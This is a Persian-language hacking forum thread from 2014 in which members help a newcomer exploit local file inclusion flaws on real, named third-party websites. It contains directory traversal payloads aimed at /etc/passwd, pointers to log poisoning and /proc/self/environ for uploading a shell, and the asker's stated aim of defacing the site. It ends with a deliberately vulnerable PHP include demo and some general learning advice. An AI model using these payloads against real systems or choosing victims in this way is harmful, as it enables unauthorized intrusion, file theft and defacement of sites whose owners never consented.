اطلاعیه

**black-sec** · 09-14-2014, 01:26 PM

RE: کمک در باره ی تارگت با باگ lfi

دوست عزیز خوش آمدی

این انجمن فقط آموزشی نیست که سوال جوابم میشه کرد

پست شما اسپم نیست

بفرما ببین به کارت میاد

http://www.insurancebrokersusa.com/page.php?page=

در ضمن برای دورک ار تاپیک زیر استفاده کن

http://www.iranhack.com/acc/thread-13.html

http://www.iranhack.com/acc/thread-457.html

موفق باشید

[img]images/smilies/Smileys/8.gif[/img]

**H4NT3R** · 09-14-2014, 01:55 PM

RE: کمک در باره ی تارگت با باگ lfi

http://www.insurancebrokersusa.com/page.php?page=../../etc/passwd
دادا چرا این الان کار نمیکنه و اجرا نمیشه اررو نمیده ؟
میشه یه راهتنمایی کنی ؟

**H4NT3R** · 09-14-2014, 04:09 PM

RE: کمک در باره ی تارگت با باگ lfi

ببینید
الان این تارگت دیگه باگ داره ولی Etc passwd نمایش داده نمیشه

http://www.leteverybreath.com/home.php?page=../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd

**Mr.XpR** · 09-14-2014, 06:48 PM

RE: کمک در باره ی تارگت با باگ lfi

هر خطایی مربوط به local file include نیست ، و در ضمن تنها فایل passwd رو چک نکنید :

فایلهای لاگ رو چک کنید همانند :

کد:

/var/log/apache2/access.log

همچنین میتونی از ابزار fimap موجود در بک ترک و کالی هم برای بهبود روند کاریت استفاده کنی .

تارگت شما حتی نمیتونه یک فایل محلی داخلی خودشو فراخوانی کنه که معلوم میشه خود application مشکل برنامه نویسی داره :

کد:

http://www.leteverybreath.com/home.php?page=../home.php
http://www.leteverybreath.com/home.php?page=../home

Fatal error: require() [function.require]: Failed opening required 'pages/../home.php.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/vasiliev/public_html/leteverybreath.com/home.php on line 197

**H4NT3R** · 09-14-2014, 06:53 PM

RE: کمک در باره ی تارگت با باگ lfi

داداش ممنون بابت پاسخ من میخوام
شل آپلود کنم و فول دییس کنم
برای این کار باید چه چیزی رو چک کنم ؟

**Mr.XpR** · 09-14-2014, 07:02 PM

RE: کمک در باره ی تارگت با باگ lfi

اول اینکه برای دیفیس دنبال علم تست نفوذ نرو چون مثل ریختن پولت توی چاهه

برای اینکه بتونی شل آپلود کنی باید بتونی فایل proc/self/environ را بخونی و writable هم باشه . ویدیو های آموزشی متعددی برای آپلود شل در مورد این آسیب پذیری قرار دادیم بهتره داخل انجمن کمی جستجو کنی .

(در ضمن عمر این آسیب پذیری هم به سر رسیده خیلی کم پیدا میشه)

اگر با fimap بک ترک ترک هم علاقه داشتی کار کنی این توضیحاتو یه بررسی بکن :

http://www.exploit-db.com/papers/12872

**Mr.XpR** · 09-14-2014, 07:21 PM

RE: کمک در باره ی تارگت با باگ lfi

برای درک بهتر این آسیب پذیری من یه محیطی برات روی یه سرور لینوکس شبیه سازی کردم :

بفرما

کد:

http://www.gdsquared.com/lfi/lfi.php?page=index.html

حالا برای تست آسیب پذیری یه کاراکتر به انتهای فایل اضافه کن به این صورت :

کد:

http://www.gdsquared.com/lfi/lfi.php?page=index.html'

حالا باید خطایی به صورت زیر دریافت کنی :

کد:

Warning: include(index.html\') [function.include]: failed to open stream: No such file or directory in /home/user/html/lfi/lfi.php on line 13

Warning: include() [function.include]: Failed opening 'index.html\'' for inclusion (include_path='.:/usr/local/php5/lib/php') in /home/user/html/lfi/lfi.php on line 13

حالا میتونی فایل passwd و environ رو بخونی چون خطای include دریافت کردیم .

ادامه کارو برو مشکل داشتی بگو کمکت میکنیم .

**H4NT3R** · 09-14-2014, 07:21 PM

RE: کمک در باره ی تارگت با باگ lfi

نه برادر فقط برای دیفیس دنبالش نیستم و میدونم کار بچه گونه ای هست در این علم من فقط سوال پرسیدم
اخه الان هر باگی رو دارم یاد میکیرم عمرش به پایان رسیده که
شما پیشنهاد میکنی چه چیز رو یاد بگیرم و بعد وارد سرور هکینگ بشم ؟

من به css و html مسلط هستم
و کمی هم c#
شما چه پیشنهادی داری در این عرصع ؟

و یه سوال دیگعه
یه دیتابیس خیلی بزرگ دارم میخوام محتویادتشو ببنم چیکار کنم سریع لود بشه ؟

**Mr.XpR** · 09-14-2014, 07:28 PM

RE: کمک در باره ی تارگت با باگ lfi

اول اینکه یه دمو برات از lfi آماده کردم میتونی روش تمرین کنی .

اگر میخای Web application security کار کنی بهتره php رو شروع کنی .

آشنایی با لینوکس ، و زبانهای مثل پرل ، پایتون و بش هم پیشنهاد میکنم .

و بعد از همه اینا تمرین و فعالیت متداوم اگر زمان و یا دانش کافی برای پیدا کردن آسیب پذیری رو نداری بهتره ابتدا خودت مثل همین LFI یه دمو طراحی کنی سپس تمرین کنی تا اون skill مورد نظر رو بدست بیاری .

**H4NT3R** · 09-14-2014, 07:34 PM

RE: کمک در باره ی تارگت با باگ lfi

ممنونم دمو رو قرار بدید با تشکر
الان دارم کلاس های c# رو هم میرم و قصد دارم به مباحث هکینگ در زمینه های مختلف مسلط بشوم

با تشکر از سایتت خوبتون

**Mr.XpR** · 09-14-2014, 07:42 PM

RE: کمک در باره ی تارگت با باگ lfi

برگرد به چند پست قبل تر دمو رو گذاشتم بیشتر دقت کن .

برای تمرین خودت روی لوکال :

دو فایل ایجاد کن

lfi.php

کد:

<html>
<head>
<title>Welcome to My Website</title>
</head>   
<body>
   
<h1>Welcome to My Demo</h1>
   
<?php $page = isset($_GET['page']) ? $_GET['page'] : 'home.php'; ?>
   
<p>You are currently at <?php echo"<a href='$page'>$page</a>";?></p>
   
<?php include($page); ?>
</body>
</html>

home.php

کد:

</b>Hello Worlds<b>

که در نهایت میتونی به صورت زیر فایل home.php را درخواست کنی :

کد:

localhost/lfi.php?page=home.php

بقیه کار رو هم توضیح دادم ، امیدوارم استفاده کرده باشی .